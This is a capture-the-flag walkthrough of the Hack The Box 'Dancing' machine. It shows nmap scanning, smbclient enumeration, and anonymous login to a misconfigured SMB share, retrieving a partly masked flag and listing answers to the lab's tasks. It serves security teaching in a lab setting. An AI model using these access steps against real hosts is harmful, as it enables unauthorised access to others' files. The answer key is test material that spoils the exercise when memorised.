Table of Contents
There are multiple ways to transfer a file between two hosts on the same network. One of these protocols is studied in this example, and that is SMB (Server Message Block). This communication protocol provides shared access to files, printers, and serial ports between endpoints on a network. We mostly see SMB services running on Windows machines.
During scanning, we will typically see port 445 TCP open on the target, reserved for the SMB protocol. Usually, SMB runs at the Application or Presentation layers of the OSI model. Due to this, it relies on lower-level protocols for transport. The Transport layer protocol that Microsoft SMB Protocol is most often used with is NetBIOS over TCP/IP (NBT). This is why, during scans, we will most likely see both protocols with open ports running on the target. We will see this during the enumeration phase of the write-up.
Using the SMB protocol, an application (or the user of an application) can access files at a remote server, along with other resources such as printers. Thus, a client application can read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request.
Despite having the ability to secure access to the share, a network administrator can sometimes make mistakes, and accidentally, allow logins without any valid credentials or use either guest accounts or anonymous logins. We will witness this in the following sections.
Enumeration
Firstly, we have to start our machine by clicking “Spawn machine”. Here on my screen, you can find out the Dancing IP address.
We start, as always, by scanning the target once we are connected to the VPN. Running the following command will make Nmap scan all of the ports and display service versions for each of them.
┌──(mrdev㉿mrdev)-[~]
└─$
sudo nmap -sV 10.129.136.156
[sudo] password for mrdev:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 23:18 IST
Nmap scan report for 10.129.136.156
Host is up (0.79s latency)
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.26 seconds
As previously mentioned, we observe that port 445/TCP for SMB is up and running (marked as green), which means that we have an active share that we could potentially explore.
Think of this share as a folder that can be accessed over the internet. In order to do so, we will need the appropriate services and scripts to be installed on your system. In order to successfully enumerate shared content on the remote system, we can use a script called smbclient.
If the script is not present on your Machine, then you can install it using the below command:
┌──(mrdev㉿mrdev)-[~]
└─$
sudo apt-get install smbclient -y
Our next step is to start enumerating the contents of the share found on our target in both cases. Before that let me find out more about the capabilities of this script alongside its usage using the help command:
┌──(mrdev㉿mrdev)-[~]
└─$ smbclient --help
Usage: smbclient service <password>
-R, --name-resolve=NAME-RESOLVE-ORDER
Use these name resolution services only
-M, --message=HOST Send message
-I, --ip-address=IP Use this IP to connect to
-E, --stderr Write messages to stderr instead of stdout
-L, --list=HOST Get a list of shares available on a host
-m, --max-protocol=LEVEL Set the max protocol level
-T, --tar=<c|x>IXFvgbNan Command line tar
-D, --directory=DIR Start from directory
-c, --command=STRING Execute semicolon separated commands
-b, --send-buffer=BYTES Changes the transmit/send buffer
-t, --timeout=SECONDS Changes the per-operation timeout
-p, --port=PORT Port to connect to
-g, --grepable Produce grepable output
-q, --quiet Suppress help message
-B, --browse Browse SMB servers using DNS
Help options:
-?, --help Show this help message
--usage Display brief usage message
Common samba options:
-d, --debuglevel=DEBUGLEVEL Set debug level
-s, --configfile=CONFIGFILE Use alternate configuration file
-l, --log-basename=LOGFILEBASE Base name for log files
-V, --version Print version
--option=name=value Set smb.conf option from command line
Connection options:
-O, --socket-options=SOCKETOPTIONS socket options to use
-n, --netbiosname=NETBIOSNAME Primary netbios name
-W, --workgroup=WORKGROUP Set the workgroup name
-i, --scope=SCOPE Use this Netbios scope
Authentication options:
-U, --user=USERNAME Set the network username
-N, --no-pass Don't ask for a password
-k, --kerberos Use kerberos (active directory) authentication
-A, --authentication-file=FILE Get the credentials from a file
-S, --signing=on|off|required Set the client signing state
-P, --machine-pass Use stored machine account password
-e, --encrypt Encrypt SMB transport
-C, --use-ccache Use the winbind ccache for authentication
--pw-nt-hash The supplied password is the NT hash
Here, we are going to use hyphen L to select the targeted host for the connection request.
Let me clear this, and input a command that will help me to interact with the server. Use the below command:
┌──(mrdev㉿mrdev)-[~]
└─$
smbclient -L
10.129.136.156
┌──(mrdev㉿mrdev)-[~]
└─$
smbclient -L 10.129.136.156
Enter
WORKGROUP\mrdev
's password:
We should take note of this. If we do not specify a specific username to smbclient when attempting to connect to the remote host, it will just use your local machine's username. That is the one you are currently logged into your Machine with. As here you can see the local username is “Workgroup\mrdev”.
This is because SMB authentication always requires a username, so by not giving it one explicitly to try to login with, it will just have to pass your current local username to avoid throwing an error with the protocol.
Nevertheless, let us use our local username since we do not know about any remote usernames present on the target host that we could potentially log in with.
Next up, after that, we will be prompted for a password. This password is related to the username you input before. Hypothetically, if we were a legitimate remote user trying to log in to their resource, we would know our username and password, and log in normally to access our share. In this case, we do not have such credentials, so we will be trying to perform either Guest authentication or Anonymous authentication.
Any of these will result in us logging in without knowing a proper username and password combination and seeing the files stored on the share. Let us proceed to try that.
We leave the password field blank, simply hitting Enter to tell the script to move along.
┌──(mrdev㉿mrdev)-[~]
└─$
smbclient -L 10.129.136.156
Enter
WORKGROUP\mrdev
's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available
┌──(mrdev㉿mrdev)-[~]
└─$
As you can see that there are four separate shares are displayed. Let us go through each of them and see what they mean.
- ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.
- C$ - Administrative share for the C:\ disk volume. This is where the operating system is hosted.
- IPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.
- WorkShares - Custom share.
$ is refers, the share is hidden and won’t be displayed when browsing shared folders.
Foothold
We will try to connect to each of the shares one by one. We will use the same tactic as before, attempting to log in without the proper credentials to find improperly configured permissions on any of these shares. First, let us try the ADMIN$ one using smbclient.
┌──(mrdev㉿mrdev)-[~]
└─$
smbclient \\\\10.129.136.156\\ADMIN$
Enter WORKGROUP\mrdev's password:
tree connect failed:
NT_STATUS_ACCESS_DENIED
The “NT_STATUS_ACCESS_DENIED” is output, letting us know that we do not have the proper credentials to connect to this share. We will follow up with the C$ administrative share and we will find the same Access Denied.
┌──(mrdev㉿mrdev)-[~]
└─$
smbclient \\\\10.129.136.156\\C$
Enter WORKGROUP\mrdev's password:
tree connect failed:
NT_STATUS_ACCESS_DENIED
┌──(mrdev㉿mrdev)-[~]
└─$
smbclient \\\\10.129.136.156\\IPC$
Enter WORKGROUP\mrdev's password:
smb: \>
ls
NT_STATUS_INVALID_INFO_CLASS listing \*
smb: \>
Last chance. We proceed with attempting to log in to the custom WorkShares SMB share. This seems to be human-made, thus prone to misconfiguration.
┌──(mrdev㉿mrdev)-[~]
└─$
smbclient \\\\10.129.136.156\\WorkShares
Enter WORKGROUP\mrdev's password:
Try "help" to get a list of possible commands.
smb: \>
Success! The WorkShares SMB share was poorly configured, allowing us to log in without the appropriate credentials. We can see our terminal prompt changed to smb, letting us know that our shell is now interacting with the service.
We can use the help command to see what we can do within this shell.
smb: \>
help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \>
From the output, we can notice that most of the commands we are used to in Linux are present. We will be
using the following to navigate the share:
- ls : listing contents of the directories within the share
- cd : changing current directories within the share
- get : downloading the contents of the directories within the share
- exit : exiting the smb shell
Typing in the ls command will show us two directories, one for
Amy.J
and one for
James.P
. We visit the first one and are met with a file called worknotes.txt, which we can download using the get command.
smb: \>
ls
. D 0 Mon Mar 29 13:52:01 2021
.. D 0 Mon Mar 29 13:52:01 2021
Amy.J
D 0 Mon Mar 29 14:38:24 2021
James.P
D 0 Thu Jun 3 14:08:03 2021
5114111 blocks of size 4096. 1733761 blocks available
smb: \>
cd Amy.J\
smb: \Amy.J\>
ls
. D 0 Mon Mar 29 14:38:24 2021
.. D 0 Mon Mar 29 14:38:24 2021
worknotes.txt
A 94 Fri Mar 26 16:30:37 2021
5114111 blocks of size 4096. 1733488 blocks available
smb: \Amy.J\>
get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
This file is now saved inside the location where we ran our smbclient command from. Let us continue looking for other valuable files in James.P directory. Navigating to it, we can find the flag.txt file. After retrieving this file, we can use the exit command or you can use ctrl +c to quit the shell and check the files we just retrieved.
smb: \Amy.J\>
cd ..
#To go back to the previous directory
smb: \>
ls
. D 0 Mon Mar 29 13:52:01 2021
.. D 0 Mon Mar 29 13:52:01 2021
Amy.J
D 0 Mon Mar 29 14:38:24 2021
James.P
D 0 Thu Jun 3 14:08:03 2021
5114111 blocks of size 4096. 1733484 blocks available
smb: \>
cd James.P\
smb: \James.P\>
ls
. D 0 Thu Jun 3 14:08:03 2021
.. D 0 Thu Jun 3 14:08:03 2021
flag.txt
A 32 Mon Mar 29 14:56:57 2021
5114111 blocks of size 4096. 1733484 blocks available
smb: \James.P\>
get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\>
exit
┌──(mrdev㉿mrdev)-[~]
└─$
Once the SMB shell is killed, we can read the two documents we exfiltrated. The worknotes.txt seems to be hinting at further services that could be exploited. Typically, these kinds of files are found lying around in machines within a Hack The Box Pro Lab, hinting towards your next target or being able to be used as a resource for further exploitation or lateral movement within the lab. In our case, it is just a proof of concept. We will not need this file.
┌──(mrdev㉿mrdev)-[~]
└─$ ls
worknotes.txt flag.txt
┌──(mrdev㉿mrdev)-[~]
└─$ cat worknotes.txt
- start apache server on linux machine
- secure the ftp server
- setup winrm on dancing
┌──(mrdev㉿mrdev)-[~]
└─$ cat flag.txt
5f61**************************64
Task Solution/Answer
TASK 1: What does the 3-letter acronym SMB stand for?
Ans. Server Message BlockTASK 2: What port does SMB use to operate at?
Ans. 445TASK 3: What network communication model does SMB use, architecturally speaking?
Ans. client-server modelTASK 4: What is the service name for port 445 that came up in our nmap scan?
Ans. microsoft-dsTASK 5: What is the tool we use to connect to SMB shares from our Linux distribution?
Ans. smbclient
TASK 6: What is the `flag` or `switch` we can use with the SMB tool to `list` the contents of the share?
Ans. -LTASK 7: What is the name of the share we are able to access in the end?
Ans. WorkSharesTASK 8: What is the command we can use within the SMB shell to download the files we find?
Ans. get
